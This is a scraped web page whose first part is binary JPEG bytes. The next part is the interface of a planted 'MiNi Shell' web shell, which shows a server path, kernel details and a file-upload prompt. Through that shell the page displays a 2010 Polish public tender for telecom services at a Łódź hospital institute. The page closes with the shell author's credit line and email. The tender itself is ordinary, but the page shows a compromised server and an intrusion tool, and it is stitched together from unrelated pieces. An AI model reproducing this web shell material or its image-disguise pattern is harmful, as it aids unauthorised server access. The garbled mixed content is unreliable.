JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100806/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100806/241894-N-2010.html

<p class="kh_header"><b>Łódź: Zakup publicznie dostępnych usług telekomunikacyjnych dla Instytutu Centrum Zdrowia Matki Polki oraz wyposażenie Instytutu w system telekomunikacyjny, umożliwiający świadczenie usług</b><br>
<b>Numer ogłoszenia: 241894 - 2010; data zamieszczenia: 06.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut "Centrum Zdrowia Matki Polki" - Samodzielna Sekcja Organizacyjno-Prawna; Zamówienia Publiczne , ul. Rzgowska 281/289, 93-338 Łódź, woj. łódzkie, tel. 042 2711188, 2711069, faks 042 2711187.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.iczmp.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Badawczo-Rozwojowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup publicznie dostępnych usług telekomunikacyjnych dla Instytutu Centrum Zdrowia Matki Polki oraz wyposażenie Instytutu w system telekomunikacyjny, umożliwiający świadczenie usług.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> <br>Zadanie Nr 1. Przedmiotem zamówienia jest świadczenie publicznie dostępnych usług telekomunikacyjnych na rzecz Zamawiającego polegających na dostępie do systemu telekomunikacyjnego, w celu zapewnienia łączności telefonicznej dla:
<br>1.	1550 abonentów w tym minimum 350 portów łączności bezprzewodowych.
<br>2.	90 jednoczesnych rozmów wychodzących i przychodzących
<br>3.	Udostępnienie Instytutowi Centrum Zdrowia Matki Polki, zwanego dalej ICZMP, systemu telekomunikacyjnego zapewniającego prowadzenie rozmów. Zaoferowany system telekomunikacyjny, wedle wiedzy Zamawiającego, będzie musiał spełniać co najmniej niżej przedstawione założenia i posiadać:
<br>3.1.	Zachować dotychczasową numerację wszystkich telefonów zewnętrznych i wewnętrznych (czyli numeracja 42 xxx-DDI). Zamawiający zastrzega niezmienność numerów DDI (ostatnie 4 cyfry).
<br>3.2.	Stanowisko recepcji do odbioru połączeń nieodebranych przez abonenta końcowego.
<br>3.3.	2 kpl. słuchawek nagłownych.
<br>3.4.	Możliwość rejestrowania rozmów co najmniej 10 abonentów, zarządzane poprzez LAN, wyszukiwanie zarejestrowanych rozmów wg. numeru abonenta wywołanego i wywołującego, czasu trwania rozmowy, czasu rozpoczęcia rozmowy, z możliwością przechowywania zarejestrowanych rozmów przez minimum 12 miesięcy.
<br>3.5.	Dostawca zapewni usługę poczty głosowej.
<br>3.6.	Dostawca zapewni minimum 450 szt. aparatów telefonicznych, w tym minimum 100 szt. aparatów do łączności bezprzewodowej	
W przypadku świadczenia usług przez operatora GSM, Zamawiający wymaga dostarczenia aparatów telefonicznych dla całej puli numerów  42 xxx DDI.
<br>3.7.	Dostawca zapewni dostęp do systemu taryfikacyjnego (bilingowego). Komputer wraz z oprogramowaniem do zarządzania systemem taryfikacyjnym.
<br>3.8.	Drukarkę laserową do komputera taryfikacyjnego.
<br>3.9.	Aktualne średnie czasy generowanych przez ICZMP połączeń w okresie 1 miesiąca:
<br>3.9.1.	lokalne - 	503:56:09 (h:m:s)
<br>3.9.2.	międzystrefowe - 	116:36:27 (h:m:s)
<br>3.9.3.	międzynarodowe - 	0:38:52 (h:m:s)
<br>3.9.4.	komórkowe - 	100:33:29 (h:m:s)
<br>4.	W poszczególnych budynkach ICZMP należy przewidzieć zainstalowanie następujących ilości aparatów telefonicznych:
<br>4.1.	Budynek Szpitala Ginekologiczno-Położniczego (bud. A) - min. 584 numerów, w tym:
<br>-	obsługa stanowiska recepcji - 4 numery
<br>-	poziom (-1) - 25 numerów,
<br>-	poziom (0) - 140 numerów,
<br>-	poziom (1) - 200 numerów,
<br>-	poziom (2) - 50 numerów,
<br>-	poziom (3) - 45 numerów,
<br>-	poziom (4) - 65 numerów,
<br>-	poziom (5) - 55 numerów,
<br>4.2.	Budynek Szpitala Pediatrycznego (bud. B) - min 430 numerów, w tym:
<br>-	poziom (-1) - 15 numerów
<br>-	poziom (0) - 190 numerów
<br>-	poziom (1) - 220 numerów
<br>-	poziom (2) - 23 numery
<br>4.3.	Budynek (C1) - 15 numerów
<br>4.4.	Budynek (C2) - 7 numerów
<br>4.5.	Budynek (C3) - 27 numerów,
<br>4.6.	Budynek (C4) - 74 numerów,
<br>4.7.	Budynek (C5) - 4 numerów,
<br>4.8.	Budynek (C6) - 5 numerów,
<br>4.9.	Budynek (C7) - 2 numery,
<br>4.10.	Budynek (D2) - 1 numer,
<br>4.11.	Budynek (D4A) - 2 numery,
<br>4.12.	Budynek (D4B) - 1 numer,
<br>4.13.	Budynek (D12) - 5 numerów,
<br>4.14.	Hotel (Łódź, ul. Paradna 46) ogółem 170 numerów.
<br>4.15.	Wykonawca winien uwzględnić rezerwę na dodatkowej ilości abonentów w wielkości min 10 %, wymienionych wyżej abonentów (użytkowników)
 
<br>5.	Zamawiający wymaga, aby system telekomunikacyjny zapewniał standardy usług telekomunikacyjnych, aktualnie obowiązujących i funkcjonujących na rynku usług telekomunikacyjnych.
<br><br>Zadanie Nr 2. Zakup publicznie dostępnych usług telekomunikacyjnych na rzecz Zamawiającego polegających na zapewnieniu łączności telefonicznej.
<br>1.	Świadczone w ramach niniejszego zamówienia usługi telekomunikacyjne będą obejmowały:
<br>1.1.	połączenia lokalne,
<br>1.2.	połączenia międzystrefowe,
<br>1.3.	połączenia do sieci komórkowych,
<br>1.4.	połączenia międzynarodowe,
<br>1.5.	Połączenia faksowe;
Wszystkie wyżej wymienione rodzaje połączeń i usług muszą dotyczyć również połączeń z innymi operatorami, bez naliczania dodatkowych opłat lub stosowania szczególnych taryfikatorów.
<br>2.	Wykonawca w ramach niniejszego zamówienia zapewni:
<br>2.1.	zachowanie aktualnych numerów DDI linii Zamawiającego. Wymóg zachowania numerów jest obligatoryjny dla całej aktualnie posiadanej przez ICZMP puli numerów 42 721-DDI;
<br>2.2.	sekundowe naliczanie czasu realizowanych rozmów telefonicznych;
<br>2.3.	możliwość realizacji minimum 90 rozmów w jednym czasie,
<br>2.4.	możliwość bezpłatnego przekazywania połączeń na terenie ICZMP;
<br>2.5.	możliwość bezpłatnego przekierowania rozmów dla wybranych numerów na terenie ICZMP;
<br>2.6.	połączenia telefoniczne nie mogą być realizowane za pomocą sieci Internet;
<br>2.7.	wszystkie połączenia wychodzące muszą być rozliczane bez opłaty początkowej, poprzez naliczanie sekundowe, które musi być przerwane w momencie rozłączenia się którejkolwiek ze stron;
<br>2.8.	usługa połączeń telefonicznych realizowana musi być przy wykorzystaniu stacjonarnego lub mobilnego zakończenia sieci dostarczonego przez Wykonawcę;
<br>2.9.	w przypadku zmiany lokalizacji na terenie ICZMP - jej bezpłatne przeniesienie w miejsce wskazane przez Zamawiającego w nieprzekraczalnym terminie 30 dni od dnia wezwania przez Zamawiającego, lub w przypadku braku możliwości technicznych dotrzymania w/w terminu, zapewnienia rozwiązania tymczasowego/zastępczego, umożliwiającego normalne funkcjonowanie Zamawiającego w ramach nowej lokalizacji;
<br>2.10.	zapewnienie tego samego planu taryfowego dla nowych instalacji stałego dostępu do sieci publicznej i świadczenia usług telekomunikacyjnych zamawianych przez ICZMP w trakcie trwania umowy. W przypadku obniżenia kwot za świadczone usługi Wykonawca zobowiązuje się do odpowiedniego zmodyfikowania planu taryfowego w porozumieniu z Zamawiającym i poinformowania na piśmie o fakcie zmodyfikowania planu taryfowego przed wystawieniem faktury za dany okres rozliczeniowy;
<br>2.11.	możliwość świadczenia usług połączeń z Internetem o prędkości minimum 2Mb/s każde;
<br>2.12.	Wykonawca (Oferent) może świadczyć usług telekomunikacyjne podnajemcom Zamawiającego na terenie Instytutu CZMP.
<br><br>	W ramach obsługi serwisowej dla zadania 1 i 2 należy zapewnić:
<br>1.	monitoring poprawności działania usługi;
<br>2.	usuwanie awarii i nieprawidłowości w działaniu usługi;
<br>3.	możliwość zgłaszania awarii przez 24h/365 dni, telefoniczne lub e-mailowe lub faksowe;
<br>4.	usunięcie awarii i nieprawidłowości w czasie do 4 godzin od momentu zgłoszenia przez Zamawiającego;
<br>5.	wykonywanie instalacji zakończenia sieci i jego uruchomienie;
<br>6.	przegląd stanu technicznego łączy oraz sprawdzenie parametrów łączy poprzez bieżące, cykliczne pomiary i eliminowanie usterek;
<br>7.	wymianę zgłoszonego przez Zamawiającego uszkodzenia: telefonów, słuchawek łączności bezprzewodowej, ładowarek, urządzenia nagrywającego, komputera taryfikacyjnego, drukarki laserowej w przypadku braku możliwości naprawy uszkodzenia;
<br>8.	wymianę materiałów eksploatacyjnych wyposażenia systemu telekomunikacyjnego.
<br>9.	Do obsługi serwisowej należy natychmiastowe powiadamianie osób upoważnionych przez Zmawiającego o awariach, nieprawidłowościach pracy sieci;
<br>10.	Powiadamianie osób upoważnionych przez Zmawiającego na piśmie o planowanych pracach z minimum tygodniowym wyprzedzeniem w celu uzgodnienia terminu prac z Zamawiający. Osoba upoważniona przez Zamawiającego potwierdza termin na piśmie; 
<br>11.	Wykonawca jest zobowiązany dokonać przeniesienia wszystkich numerów ICZMP puli numerów 42 xxx-DDI do swojej sieci.
<br>11.1.	Przerwa techniczna w łączności z siecią publiczną spowodowana pracami przełączeniowymi nie może być dłuższa niż 5 godzin.
<br>11.2.	Przełączenie może mieć miejsce jedynie w godzinach nocnych, po godz. 22.00 do godz. 6.00;
<br>11.3.	Wymaganym dniem tygodnia na przełączenia jest noc z soboty na niedzielę;
<br>11.4.	Data przełączenia systemu łączności bezprzewodowej będzie określona w Umowie i nie może przekroczyć 30 dni od daty podpisania umowy.
<br>12.	W przypadku, gdy zostanie podpisana umowa z dotychczasowym Dostawcą na wyżej wymienione usługi, wszystkie dotychczasowe umowy dotyczące świadczenia usług objętych tą umową ulegają rozwiązaniu na zasadach porozumienia stron, a wszystkie zasady świadczenia usług przejmuje umowa zawarta w ramach tego postępowania.
<br>13.	Wykonawca w ramach zamówienia zobowiązuje się do świadczenia dodatkowych usług:
<br>13.1.	automatyczne serwisy informacyjne;
<br>13.2.	zapewnienie możliwości wykonywania połączeń na numery alarmowe, informacyjne i usługowe (np. 9226, 999) oraz numery wewnętrzne ICZMP;
<br>13.3.	Prezentacja numeru;
<br>13.4.	Blokada prezentacji numeru;
<br>13.5.	Świadczenie usług telekomunikacyjnych z zachowaniem wskaźników jakości określonych przepisami prawa;
<br>13.6.	zablokowanie możliwości uzyskiwania połączeń z numerami 020X, 030X, 040X i 070X - dotyczy wszystkich numerów objętych niniejszym postępowaniem.
<br>14.	Zamawiający zastrzega sobie możliwość składania, przez osoby upoważnione przez Zmawiającego, reklamacji, zmian lokalizacji stacji, potrzeb instalacji nowych stacji abonenckich drogą elektroniczną (e-mail), telefoniczną lub pisemnie;
<br>15.	Zamawiający upoważnia osoby do kontaktów bezpośrednich z Wykonawcą oraz odpowiedzialne za prawidłowe wykonywanie postanowień umowy.
<br>16.	Dane osób upoważnionych do kontaktów z Wykonawcą:
Paweł Bolewski, Stanisław Kuśmierz, Anna Zielińska 
<br>17.	Wykonawca zobowiązany jest do wyznaczenia minimum jednej dedykowanej osoby odpowiedzialnej za prawidłowe wykonywanie postanowień niniejszej umowy i do kontaktów bezpośrednich z Zamawiającym.
<br>18.	Wykonawca zobowiązany jest do przeszkolenia dwóch osób Zamawiającego w zakresie obsługi programu taryfikacyjnego tak, aby była możliwość taryfikowania zarówno pojedynczych, jak i grup numerów telefonicznych.
<br>19.	Wykonawca wystawiać będzie dokumenty rozliczeniowe, bilingi dla Zamawiającego w formie elektronicznej (EXCEL), umożliwienie monitorowania bilingów na stronie internetowej Wykonawcy oraz w wersji papierowej na żądanie Wykonawcy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 64.20.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie potwierdzające możliwość zawarcia umowy o świadczenie publicznie dostępnych usług telekomunikacyjnych</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art.144 ust. 1 PZP Zamawiający przewiduje możliwość dokonania zmiany w zawartej umowie w następujących sytuacjach:
<br>1.	zmiany stawki podatku VAT;
<br>2.	zmiany organizacyjnej Zamawiającego istotnej dla realizacji niniejszej umowy;
<br>3.	zmiany formy prawnej prowadzonej działalności gospodarczej;
<br>4.	zmiany adresu siedziby firmy i zmianie adresu zamieszkania właściciela lub współwłaściciela firmy;
<br>5.	w przypadku gdy zmiana ceny za połączenia jest niższa, tj., korzystna dla Zamawiającego;
<br>6.	w przypadku obniżenia kwot za świadczone usługi Wykonawca zobowiązuje się do odpowiedniego zmodyfikowania planu taryfowego w porozumieniu z Zamawiającym i poinformowania na piśmie o fakcie zmodyfikowania planu taryfowego przed wystawieniem faktury za dany okres rozliczeniowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.iczmp.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Instytut Centrum Zdrowia Matki Polki, 93-338 Łódź ul. Rzgowska 281/289, Samodzielna Sekcja Organizacyjno-Prawna - Zamówienia Publiczne, pawilon A (Ginekologiczno-Położniczy), poziom 0, pok. Nr 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.08.2010 godzina 11:00, miejsce: Instytut Centrum Zdrowia Matki Polki, 93-338 Łódź ul. Rzgowska 281/289, Samodzielna Sekcja Organizacyjno-Prawna - Zamówienia Publiczne, pawilon A (Ginekologiczno-Położniczy), poziom 0, pok. Nr 15.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com